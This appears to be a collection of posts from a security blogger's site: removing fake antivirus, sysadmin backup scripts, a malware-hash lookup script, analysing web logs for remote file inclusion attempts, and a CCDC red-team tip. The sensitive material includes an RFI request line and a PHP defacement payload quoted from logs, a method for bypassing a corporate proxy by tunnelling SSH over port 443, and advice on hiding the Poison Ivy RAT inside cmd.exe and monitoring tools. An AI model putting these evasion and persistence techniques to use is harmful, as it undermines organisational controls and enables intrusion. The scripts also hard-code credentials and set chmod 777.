Vista 2010 is a rogue anti-virus program that is usually advertised through the use of pop ups and fake security alerts that state that your computer is infected and that you should run an online anti-malware scan. Once the rogue program is installed, it will claim to scan your computer for malware and display a list of false threats just to confirm that your computer is infected with malware (usually Trojans and computer worms). Then it will ask you to pay for a full version of the program in order to remove the threats which as we already know don’t even exist. Most importantly, don’t buy it. If you did, then please contact your credit card company and dispute the charges.

Though this piece of malicious code is extremely annoying it is also very easy to remove. I have put a kit together for quick download to remediate this issue. The kit includes a custom batch file called avkill that will loop looking for the process av.exe and kill it automatically. This will allow you to execute other tools to remove the virus. It also includes a registry fix to remove the changes it makes to the registry. The file is called fix.reg and contains the following information:

Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Classes\.exe]

[-HKEY_CURRENT_USER\Software\Classes\secfile]

[-HKEY_CLASSES_ROOT\secfile]

[-HKEY_CLASSES_ROOT\.exe\shell\open\command]

[HKEY_CLASSES_ROOT\.exe]

@=”exefile”

“Content Type”=”application/x-msdownload”

To download the kit go to http://www.digitaloffensive.com/files/av2010.zip

The first thing you need to do is to extract the kit and open the avkill executable. This will stop the av.exe process that is associated with this virus. Once that is running just minimize it and let it continue to run. Then either use regedit or just double click the fix.reg file to remove the virus from your registry and to stop it from restarting. Once this is done successfully you can now stop the avkill executable. This process will stop the virus from running. Once it is stopped we suggest you go to http://www.malwarebytes.org/ and download their free scanner to remove the actual malicious files from your system.

If you have any questions or concerns please feel free to contact me.

Years ago I did web hosting as a side source of income. This led to me developing  a lot of Linux based scripts to help automate my daily sysadmin responsibilities. Our hosting company was  called ezhostingpro.com. Since then another party owns the domain but googling that and my name will lead you to several of my scripts being hosted by other sites. I posting the code on my site as I am finding many people on http://www.getafreelancer.com using codes I post on this site to bid on projects and win them.

This script is in two parts. The first part creates the backup and the second part transfers the backup remotely. The first part of the script makes use of the built in backup commands in cpanel. The script needs minor changes to be used by resellers instead of dedicated server owners.

Script 1:

#!/bin/bash

############################################
## ##
## EZHOSTINGPRO BACKUP FTP SCRIPT v1.0 ##
## Created by Michael LaSalvia ##
## http://www.digitaloffensive.com ##
## 2/23/04 rev 1 ##
############################################
## 1. Create a file called cpbackup.txt in /root
## 2. Place account names you wanted backup
## 3. Save file in /root
############ DO NOT EDIT BELOW #############
cd /root
for users in $(cat cpbackup.txt)
do
rm -rf /home/$users/cpmove-$users.tar.gz
/scripts/pkgacct $users
mv /home/cpmove-$users.tar.gz /home/$users/
cd /home/$users
chown $users.$users cpmove-$users.tar.gz
chmod 777 cpmove-$users.tar.gz
/home/$users/bkftp.sh
cd /root
done

Script 2: This script needs to beedited with the users ftp credentials and placed in the user home dir.

#!/bin/bash

##################################
## EZHOSTINGPRO REMOTE BACKUP ##
## created by: Michael LaSalvia ##
##http://www.digitaloffensive.com##
## DO NOT EDIT THIS FILE ##
## Name this file bkftp.sh chmod 777 ##
##################################

### VARIABLES ###

var_cpaneluser=’cpanel_user_goes_here’
var_remote=’remote_server_goes_here’
var_ftpuser=’remote_server_ftp_username_goes_here’
var_ftppass=’remote_server_ftp_password_goes_here’

cd /home/$var_cpaneluser
ftp -n $var_remote <<END_SCRIPT
quote USER $var_ftpuser
quote PASS $var_ftppass
del cpmove-$var_cpaneluser.tar.gz
put cpmove-$var_cpaneluser.tar.gz
quit
END_SCRIPT
exit 0
rm -Rf cpmove-$var_cpaneluser.tar.gz

I believe the newer cpanel system actually provides a built in method to do this, though since I do not have access to one to test I will post this any way. If you have any questions comments or concerns please feel free to contact me.

The initial interest for this research came to me after reading an article on this on the site http://enclavesecurity.com/ . In the article they talk about using the malicious hashes to discover malware and other malicious files on their systems. They also take a deeper look into the recent APT and Auroa attacks on Google. Though the thing I found most interesting is trying to develop a way to automate this process for free and provide usable information.

The biggest thing to understand before continuing on is that this is not a fool proof process as a simple change of the file will change the hash of the file. For example if you have the c99.php shell and change the password or add a white space to the php this will change the hash of the file hence making detection via this method impossible. The other issue I have noticed in using this methodology is no one is willing to share all the information. Many companies will only share bits and pieces such as “The Malware Hash Registry” (http://www.team-cymru.org) considered the leading authority on this topic. They make part of their service available online to submit hashes to and get back the following information:

Ex:1: 7697561ccbbdd1661c25c86762117613 1258054790 NO_DATA

Ex:2: cbed16069043a0bf3c92fff9a99cccdc 1231802137 69

In example 1 you see the md5 hash then the epoch date and time then NO_Data meaning it could not tell if this hash is malicious.  In example 2 you see the same except instead of NO_data you see 69. This number means that 69% of the Antivirus vendors they used to check this file with found it to be malicious. This info is good but I find it to be not very helpful. It is nice to know that it was detected as malicious but is it truly malicious and if it is what type of malicious file is it, is it a backdoor, key logger or so on. I have emailed them asking if they could provide the detection type; with understanding that most of their system is private as they will not disclose the database or the vendors they use to scan the files. Though I have not heard back from them at this point.

This led me to searching the internet for other sites like this that provided additional information along with the hash. In this search I found one other site called http://malwarehash.com a sub site of the company NoVirusThanks.org. They provide an online utility to submit your hash to and if it is discovered as malicious it will give you info back. See screen shot below:

As you can see they provide an additional layer over what you get from the Malware Hash Registry. On top of that they use a simple PHP script for the query that makes scripting this so much easier:

http://www.malwarehash.com/result.php?hash=1E71DE2D6A89AA9796344BB7FA23AC7E

As you can see in the URL you have the site the script and the hash. The only issue with this site is that it seems they have not updated their database since 6/2009. I have contacted them as well to ask them about this and to see what their plans are for the site though I have not heard back from them either.

With this information in hand I set forth to develop a script that would allow me to automate this process as we have found this methodology to be helpful at work even if it is not 100% accurate as we notice that most malware will not get detected by our Anti virus so by using the hashes and relying on the internet community we are able to help our detection and remediation of malicious files.

To use this script you will need to have a Linux user account and some basic knowledge of Linux to set the variables properly. I wrote the script in bash for two reasons 1 it is a piece of cake to do and 2 so you be forced to move the malicious file off a windows environment where you stand a higher chance of infecting your self.  First access your shell and create a directory called what ever you want but in the code we used a directory called infect that is set in a variable for easy changing. Once you do that copy the malware-hash.sh script to 1 directory above the folder you just created. Then copy the sed script file to a file called clean in the directory that you created. Once you have done this chmod the malware-hash.sh script so you can execute it and chmod the clean script so the malware-hash.sh script can read it. Once done all you have to do now is copy the suspicious files to the directory you created and execute the script. The script will get a listing of all the files in that folder, remove the clean script, and any dupes from the listing and then get the md5 hash of each file. Once it gets the hashes it will create a batch file to be processed against The Malware Hash Registry and save the results in a clean human readable format. We use the batch function to stay with in the TOS of the site.  This includes adding the file names in front of the hash so you know what the hash belongs to. Next it will take the hashes and run them through the site Malwarehash.com. We use the –random-wait command with wget here to not act like a bot or script. If it gets a hit for a infection we will grab the site and scrape out the data we want then process it into a human readable report. Once all done we will combine the results of both checks and email the final results to the email address provided.

The script is written in bash and is highly documented:

The script is broken down into 2 sections the actual script and the sed script file.

Part 1 the Script: Copy this script to a file with a .sh extension or download it here http://www.digitaloffensive.com/malware-hash.sh . I suggest downloading it as the word press system will definitely destroy the formatting of the code. Place this script 1 directory up from the directory that you are using for the infected files.

#!/bin/bash
################################################
## MALWARE HASH BASH                           ##
## Written by Michael LaSalvia                  ##
## http://www.digitaloffensive.com              ##
## Inspired by an article at enclave Security ##
################################################

#Variables and clean up
#Edit in Path to dir that contains file for analysis
inPath=/home/mike/virus/infect

#Path to your md5sum app to verify it is not compromised. I got the hash from a new install on fedora 12.
wmd5sum=/usr/bin/md5sum

md5sum /usr/bin/md5sum > .tmp
mverify=`cut -f 1 -d ‘ ‘ .tmp`
if [$mverify == 019329f334fa7ef6116ad1a24271c8da ] then
echo “Your md5 hash matches”
else
echo ” Your md5sum hash is not right, Please verify it before continuing. Press CTRL+C now to exit”
fi
rm -Rf .tmp
# I strongly urge you to make sure your md5 application is not compromised or the rest of this script is useless.
Sleep 20

#Get a list of file to analyze and get their hash
ls $inPath > files.txt
for vfiles in $(cat files.txt)
do
cd $inPath
md5sum $vfiles >> hashes
sort hashes | uniq > $inPath/hashes.txt
done
#Clean up my files
cat $inPath/hashes.txt | grep -v hashes >> .tmp; mv .tmp $inPath/hashes.txt
cat $inPath/hashes.txt | grep -v md5 >> .tmp; mv .tmp $inPath/hashes.txt
cat $inPath/hashes.txt | grep -v clean >> .tmp; mv .tmp $inPath/hashes.txt

#Format file to submit to http://www.team-cymru.org as a batch
cut -f 1 -d ‘ ‘ $inPath/hashes.txt >> $inPath/md5hash.txt
cut -f 3 -d ‘ ‘ $inPath/hashes.txt >> $inPath/md5name.txt
echo “begin”| cat – $inPath/md5hash.txt > .tmp && mv .tmp $inPath/md5hash.txt
echo end >> $inPath/md5hash.txt
rm -Rf $inPath/hashes.txt

#Send batch request o the Malware Hash Registry (I Love netcat)
nc hash.cymru.com 43 < $inPath/md5hash.txt > $inPath/md5results.txt

#Clean up response and format it
cat $inPath/md5results.txt | grep -v “#” >> .bk; mv .bk $inPath/md5results.txt
paste $inPath/md5name.txt $inPath/md5results.txt > $inPath/results.txt
#cat $inPath/results.txt
cat $inPath/md5hash.txt | grep -v “begin” >> .tmp; mv .tmp $inPath/md5hash.txt
cat $inPath/md5hash.txt | grep -v “end” >> .tmp; mv .tmp $inPath/md5hash.txt

#Dirty web scraper and formating (site may be out of date)
for whashes in $(cat $inPath/md5hash.txt)
do
wget –random-wait http://www.malwarehash.com/result.php?hash=$whashes -O $whashes
if grep “INFECTED” $whashes > /dev/null; then
cat $whashes | grep -m 1 a-squared >> $inPath/.tmp
cat $whashes | grep -m 1 “Avira AntiVir” >> $inPath/.tmp
cat $whashes | grep -m 1 “Avast<” >> $inPath/.tmp
cat $whashes | grep -m 1 AVG >> $inPath/.tmp
cat $whashes | grep -m 1 BitDefender >> $inPath/.tmp
cat $whashes | grep -m 1 ClamAV >> $inPath/.tmp
cat $whashes | grep -m 1 Comodo >> $inPath/.tmp
cat $whashes | grep -m 1 “Dr.Web” >> $inPath/.tmp
cat $whashes | grep -m 1 Ewido >> $inPath/.tmp
cat $whashes | grep -m 1 F-PROT >> $inPath/.tmp
cat $whashes | grep -m 1 “G DATA” >> $inPath/.tmp
cat $whashes | grep -m 1 IkarusT3 >> $inPath/.tmp
cat $whashes | grep -m 1 Kaspersky >> $inPath/.tmp
cat $whashes | grep -m 1 McAfee >> $inPath/.tmp
cat $whashes | grep -m 1 “Malware Hash Registry” >> $inPath/.tmp
cat $whashes | grep -m 1 NOD32 >> $inPath/.tmp
cat $whashes | grep -m 1 Norman >> $inPath/.tmp
cat $whashes | grep -m 1 Panda >> $inPath/.tmp
cat $whashes | grep -m 1 “QuickHeal” >> $inPath/.tmp
cat $whashes | grep -m 1 “Solo Antivirus” >> $inPath/.tmp
cat $whashes | grep -m 1 Sophos >> $inPath/.tmp
cat $whashes | grep -m 1 TrendMicro >> $inPath/.tmp
cat $whashes | grep -m 1 VBA32 >> $inPath/.tmp
cat $whashes | grep -m 1 “VirusBuster” >> $inPath/.tmp
#More Cleaning and report creation.
sed -f $inPath/clean $inPath/.tmp > $inPath/.tmp1; mv $inPath/.tmp1 $inPath/$whashes
rm -Rf .tmp .tmp1
echo “Results from MalwareHash.com” >> $inPath/final_report.txt
echo ” ——————————————————” >> $inPath/final_report.txt
echo “$whashes : ” >> $inPath/final_report.txt
echo ” ——————————————————” >> $inPath/final_report.txt
cat $inPath/$whashes >> $inPath/final_report.txt
echo ” ——————————————————” >> $inPath/final_report.txt
else
echo “Results from MalwareHash.com” >> $inPath/final_report.txt
echo “NO RESULTS FOUND for: $whashes” >> $inPath/final_report.txt
echo ” ——————————————————” >> $inPath/final_report.txt
fi
rm -Rf $inPath/$whashes
rm -Rf $inPath/md5*
rm -Rf $inPath/hashes
done
cat $inPath/results.txt | cat – $inPath/final_report.txt > .tmp && mv .tmp $inPath/final_report.txt
echo “Results from The Malware Hash Registry” | cat – $inPath/final_report.txt > .tmp && mv .tmp $inPath/final_report.txt
mail -s”Malware” me@me.com < final_report.txt

Part 2 the sed script:

Copy this code and put it in a file called clean located in the folder that has the files you want to analyze and chmod it so the script can read it.

s/<tr><th>/AV Name:/
s/<tr><th width=”150″>/AV Name:/
s/<\/th><td width=”83″>/ Sig Version:/
s/<\/td><td width=”100″>/ Engine Version:/
s/<\/td><td width=”116″>/ Engine Version:/
s/<\/th> <td width=”83″>/ Sig Version:/
s/<\/td> <td width=”116″>/ Engine Version:/
s/<\/t<td width=”213″><font color=”#336600″ size=”3″>-/ Virus Name: Nothing Found/
s/<\/t<td width=”213″><font color=”#336600″ size=”3″>-/ Virus Name: Nothing Found/
s/<\/td><td width=”213″> <font color=”#336600″ size=”3″>-/ Virus Name: Nothing Found/
s/<\/td><td width=”213″> <font color=”#CC0000″ size=”2″>/ Virus Name: /
s/<\/td><td width=”213″><font color=”#CC0000″ size=”2″>/ Virus Name: /
s/<\/td><td width=”190″> <font color=”#CC0000″ size=”2″>/ Virus Name: /
s/<\/td> <td width=”213″> <font color=”#336600″ size=”3″>-/ Virus Name: Nothing Found/
s/<\/td> <td width=”213″> <font color=”#CC0000″ size=”2″>/ Virus Name: /
s/<\/font><\/td><//
s/\/tr>//
s/<\/font><\/t//
s/<\/font> <//
s/<\/font><\/td> <\/tr//
s/> <\/tr//
s/d>//

Though this methodology is a few years old there is many things that can be done with this. For example we are in the process of writing a tripwire type script that will allow web masters to monitor changes to their sites and to be able to quickly see what was added or modified as well as run it though the process above to search for infections / compromise

As always if you have any questions, comments or concerns please feel free to contact me.

Several months ago an organization I work for implemented BlueCoat Web Proxy but they did not purchase a SSL offload card (required for organizations of our size as a license alone would bog down the rest of the box) or a SSL License. This basically limited the ability for us to filter anything on port 443 unless we knew the IP to set in policy to block since the page was encrypted and we could not decrypt the packet to apply policy.

This limitation creates a security concern because it allows users to use secure protocols to bypass policies. For example most likely your organization has a policy that blocks you from going to internet based email such as Gmail, Yahoo and so on. Well thanks to Gmail for worrying about its user’s security and privacy we can now bypass the BlueCoat Web Proxy. If we go to https://mail.google.com the BlueCoat Web proxy will not see that as a mail site as the URL will be translated to an IP and the packets are encrypted. The other benefit of Gmail is that it will not redirect you to any http it makes sure if you choose https it will not redirect you back to http unlike Yahoo, who redirects you from https at the login to http once you get sent to your mailbox. You can use this method for any https site that does not any time redirect you to http. Side note many sites are not as big as Google so blocking their IP range to stop you from bypassing the BlueCoat web proxy may be easier.

The next issue is since https is required by most companies to be able to carry out a normal work day there is most likely a firewall rule in the organization that reads as follows: source: BlueCoat Web Proxy IP –> destination: Any –> service: http and https.  This rule basically says anyone going out as the web proxy is allowed to any destination on either port 80 or 443. Since the BlueCoat does not act as application proxy meaning it does not analyze the protocols you can use open ports to tunnel any application over. For example since the BlueCoat our organization has (most schools and smaller shops don’t have this either) does not have a SSL offload card and a SSL license and port 443 is open I can take advantage of this to bypass security. For example I have altered my SSH daemon at home to listen on port 443 instead of the default port of 22. This allows me to circumvent both the Web Proxy and the Firewall. This happens for several reasons 1^st because the BlueCoat web proxy cannot analyze the https request, 2^nd the BlueCoat web proxy does not act as a application proxy and third since we are using port 443 and the proxy is configured to intercept port 443 our traffic is leaving the organization as that of the proxy hence making use of the firewall rule to allow us anywhere on the internet on that port.  Many applications that connect to the internet on certain ports can be configured to use whatever port you want. For example it is possible to configure your favorite instant messenger application such as AIM or Yahoo to make connections outbound over port 443 hence bypassing the controls put in place.

Now if you are an administrator of the BlueCoat you can detect people doing this slightly by reviewing the BlueCoat reporter logs. These connections will show as IP addresses and have the category TCP Tunnel. If you look at the IP addresses closely you can get an idea of what they are being used for. To do this you can use tools like arin.net or even Google to search for information related to that IP.  You can also check the employee’s machine for applications that are not installed by your organization. This is a manual process and may cost more man hours then it would cost to purchase a SSL License and if need be a SSL offload card.

This technique may be able to be used on other proxies though I have not tested it on any. As always if you have any comments or questions please feel free to contact me.

Edit Note: I want to thank Tim C: For the update and clarification on the card name and required license.

Some people use Google and Google hacking Database to find their targets and others use their own servers to find potential compromised boxes.

In this quick little update I am going to give you a basic idea on how to use your web server’s access logs to help find compromised hosts on the internet. I will be referencing Linux mostly but the same concept would be doable on a Windows IIS server as well.

On my webhost I am running CPanel for site management / server management. CPanel provides the ability to access the raw logs through the portal. These raw logs are almost the same as the access_logs you would find in a standard Apache setup on Linux. If you are running windows please refer to your IIS access logs and make sure they are configure to display the proper options so you can see the requested URL.

The logs of your web server contain a lot of useful information. It can help you diagnose site and server issues, help to see the type of traffic you are getting (ideal for SEO and marketing), help pin point possible attacks against your sites as well as slew of other bits of useful information.

But we are going to use this article to discuss using them to find potential compromised hosts.

Let’s take a look at a sample log:

72.x.x.x – - [26/Jan/2010:04:36:31 -0600] “GET /feed/ HTTP/1.1″ 304 – “-” “Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 5 subscribers; feed-id=16402550693898658203)”

76.12.124.76 – - [26/Jan/2010:04:40:38 -0600] “GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1″ 301 – “-” “Mozilla/5.0″

76.12.124.76 – - [26/Jan/2010:04:40:38 -0600] “GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1″ 403 82481 “-” “Mozilla/5.0″

193.x.x.x – - [26/Jan/2010:04:53:53 -0600] “GET /robots.txt HTTP/1.1″ 200 24 “-” “Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)”

72.x.x.x – - [26/Jan/2010:05:02:49 -0600] “GET /feed/ HTTP/1.1″ 200 73246 “http://www.digitaloffensive.com/feed/” “Mozilla/5.0 (Compatible)”

77.x.x.x – - [26/Jan/2010:05:07:01 -0600] “GET /2009/10/c99-and-variant-php-shell-detection-quarantine-and-removal/insert_adhere_url_here HTTP/1.1″ 404 10329 “-” “Yandex/1.01.001 (compatible; Win16; I)”

92.x.x.x – - [26/Jan/2010:05:30:12 -0600] “GET /2009/09/fun-with-poison-ivy/ HTTP/1.1″ 200 18062 “http://www.google.com/search?hl=en&safe=off&q=poison+ivy+mutex&aq=f&aql=&aqi=&oq=” “Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)”

As you can see above we have several different visitor types. There are several spiders / bots that came by the site as well as several visitors from search engines such as Google. Though the two entries we want to look at closer are the entries that start with:

76.12.124.76 – - [26/Jan/2010:04:40:38 -0600]

This shows that access was attempted to the URL:

/?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt??.

In this attempt the attacker was trying to use the remote file inclusion attack that I mentioned above. If I Google the SRC IP. I find that is a known malicious site used for automated scanning and distribution of malware. Though the part where it says ROOT= ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? is why you guys are here.  If you visit this URL directly you will see that the attacker uploaded the following defacement code (WARNING:Going to these URL’s may cause damage to your computer) :

<?php /* Fx29ID */ echo(“FeeL”.”CoMz”); die(“FeeL”.”CoMz”); /* Fx29ID */ ?>

Basically this code would get rendered into the remote host via the remote file inclusion defacing the site to show his tag. It will then use the php command die to stop the rest of the page from loading only showing their tag.

Now if we were malicious we could use Google or your favorite security site to research known vulnerabilities for osCommerce to compromise the site as well. You could also do additional research on the site to help gain more of a idea of how the attack was carried out and maybe even the version of the software they are running be it osCommerce or something else like phpBB.

Though since we are good folks we will contact the site owners and let them know about the compromise. We also blocked the blocked the source IP address as well.

If you want to quickly analyze your logs for things like this I would suggest using a little command line fu on your favorite Linux distribution. For example:

cat /var/log/httpd/access_log | grep *.txt | grep –v robots.txt

This will display all the access attempts that have .txt and not any attempts for robots.txt.

As always I hope this provided you with some useful information. If you have any questions please feel free to let us know.

Over a year ago I wrote a post on the Poison Ivy Trojan (Tool) by the team over at http://poisonivy-rat.com. The original post can be found here http://digitaloffensive.genxweb.net/2009/09/fun-with-poison-ivy/. I wanted to take a few minutes to add another function I discovered at the last CCDC that made this tool that much better.

If you read my original post on this tool at the link above you will see in the third paragraph where it says “Screen 3” I mention how you can inject this into processes. Not only does it inject into the process but every time the process is called Poison Ivy is re-executed.  Now this was helpful because most of the kids at the CCDC were expecting to see Poison Ivy used again as it was in the past and they had a good idea on how to find it and stop it. So we had to become craftier then them. So I decided to attach it to the cmd.exe as well as the security tools they were using to monitor our connections such as TCPview and TCPKiller. This allowed Poison Ivy to continue running every time they tried to stop us.

This brings up another good point when ever doing forensics work on a computer that may be infected either check the md5 sum of the tools that you are using on the machine or bring your own tools to run on a non writeable media. This will make sure that you are not causing any additional damage and that the results you are receiving are correct and not altered.

As I play with this more and as it is warranted I will add additional Tips about this powerful RAT. IF you have any questions or concerns please feel free to contact me.

#!/bin/bash
#######################################
## Simple Google Query and web scraper
## Written by Michael LaSalvia
## http://www.digitaloffensive.com
## Created: 1/15/09
#######################################
##Variables
tFile=gmath.txt
oFile=rmath.txt
rm $tFile
echo “If there was a error above this line that is ok”
echo “###################################”
echo “# Press (a) for addition          #”
echo “# Press (s) for subtraction       #”
echo “# Press (m) for multiplication    #”
echo “# Press (d) for division          #”
echo “###################################”

echo -e “What do you want to do:”
read Mmath
case $Mmath in
“a”) dMath=%2B && echo “You chose addition”;;
“s”) dMath=- && echo “You chose subtration”;;
“m”) dMath=* && echo “You chose multiplication”;;
“d”) dMath=/ && echo “You chose divsion”;;
esac

Now that we know what arithmetic the end user wants to do we need to find out what variables they want to use. To do this we do this:

echo -e “Enter first number:”
read nNum1
echo -e “Enter Second number:”
read nNum2

Now that we have all the needed variables comes the fun part. We now need to construct the URL, but since it is Google and they do not allow automated responses we need to make our script look like a real user agent as well. (WARNING: This may break Google’s AUP). To do this we used the following code:

wget –header=”User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)” “http://www.google.com/search?hl=en&safe=off&q=$nNum1$dMath$nNum2″ -q -O $tFile

The user agent we chose to masquerade as was Internet Explorer 8. You will also notice that we outputted the file to a “known” file. This makes the rest of the process much easier and simpler to code.
Now that we have the full page downloaded we need to find just the information we want. To do this I first manually reviewed the source code of the page and notice that no matter what math problem I entered the source code always had the following around each problem EX.

Code: style=”font-size: 138%;”><b>999 + 998 = 1<font size=”-2″> </font>997</b>

So to remove everything except what I wanted I used the following code:

cat $tFile | awk -F “138%\”><b>” {‘print $2′} | awk -F “</b>” {‘print $1′} > $oFile
echo “Your answer is:” && cat $oFile

You will notice that I did not clean the file fully, that is because I noticed that when it was echoed to the terminal the html that was left did not show and instead of sitting there using “sed” to fully clean it up I left it as is.
I hope you have learned something from this. If you have any questions or concerns please feel free to contact me.

Here is a screen shot:

I have updated the Wordpress code on the site as well as added Wordpress Security scanner to detect malicious files and help to thwart any hack attempts. I have also added a share mod to this site so you can instantly post my posts to Facebook, Twitter, Digg and so on.
Till next time take care.

For those that know me each you I volunteer some of my time to help college students who are interested in Information Security put their knowledge to the test through the CCDC (Collegiate Cyber Defense Competition).

Each year I join other professional penetration testers and security guru’s to fill the role of the “Red Cell”. We become the guys that you learn fear for the next 12 to72 hours depending if it is the regional prelim or regional final CCDC event. We have one purpose and one purpose only to get in to the students fictitious company and cause them to lose points and business.

In the mean time the students are broken down by colleges. The student teams are referred to as the “Blue Cell” and each group has the exact same network that they are working with as well as the exact same business injects they must complete in order to gain points. The students take on the role of a newly hired IT firm as the company had just released all their IT staff for one reason or another and the CEO is demanding the business to continue as normal (Sounds familiar?)

At the end of each event since this is a learning experience for the kids we do a question and answer session to give these students the opportunity to ask us how it was done. What they can do better and so on and so forth.

Now for the first time ever you can see the full length CCDC documentary that was professionally filmed in HD at http://www.youtube.com/user/CyberWATCHcenter.

I make appearances and interviews in several of the videos.

To learn more about the CCDC check the following sites:

http://www.cyberwatchcenter.org/

http://www.nationalccdc.org/

It is no secret that almost all the cell phone companies today allow you to send txt messages to a person’s cell phone for free by means of emailing them a txt. This does not mean the company will not charge the receiver but the sender will not be charged.  To do this all you need is a email client or a web mail client and the following information:

T-Mobile: phonenumber@tmomail.net
Virgin Mobile: phonenumber@vmobl.com
Cingular: phonenumber@cingularme.com
Sprint: phonenumber@messaging.sprintpcs.com
Verizon: phonenumber@vtext.com
Nextel: phonenumber@messaging.nextel.com

For example if I want to txt 717-555-1234 and that user is a Verizon user you would simply put 7175551234@vtext.com in the “To” field and enter a small message in the body. Remember most cell phones are limited to 160 characters and cannot handle all the crazy things a standard email can.

Though an enough on this as you are here to learn about the code and a simple Google and can provide you with more information on the above topic.

Since I rarely try to PHP program I decided to write a PHP e-mailer that basically gave the user the ability to use a web form to send a SMS message to someone through an email.

The URL above will no longer work I removed the file so spammers and script kiddies could not use it.

To follow a long you need to have basic knowledge of PHP and HTML. If you do then this will be simple for you.  To view the code you can download it by click here http://www.digitaloffensive.com/mailer.txt

Section 1: This contains the author’s information as well as a warning about using the script as it is not written securely. This section also contains the die command to stop scrip kiddies from using file include and leaching off the script.

Section 2: Is the actual PHP code this is where I define the variables by using $variableName = $_POST[‘textboxName’]. I use the POST command instead of the GET command as POST is used for tasks that will be done in the background and not displayed to the end user in the URL. In this section I also put basic logic check functionality in. Basically by using “if isset” I am able to define a field to make sure something is inserted before executing the code. If I did not have this in their every time the page loaded it would try to send and fail since no fields are defined by default. The final key element of this section is the “mail” command this is a PHP built in command and will use the “sendmail” application to send mail.

Section 3: This section contains the actual code to make the form. This is the entire html that makes the text boxes and submit button. The key elements here are the names I used for the text box in the “id=”  or in the “name=” field as they tie in directly with the variables in the PHP section.

That covers all the code if you have any questions please feel free to post a comment and I will answer them. I plan to develop security in this app as I sharpen my skills of the PHP language past just searching for vulnerabilities.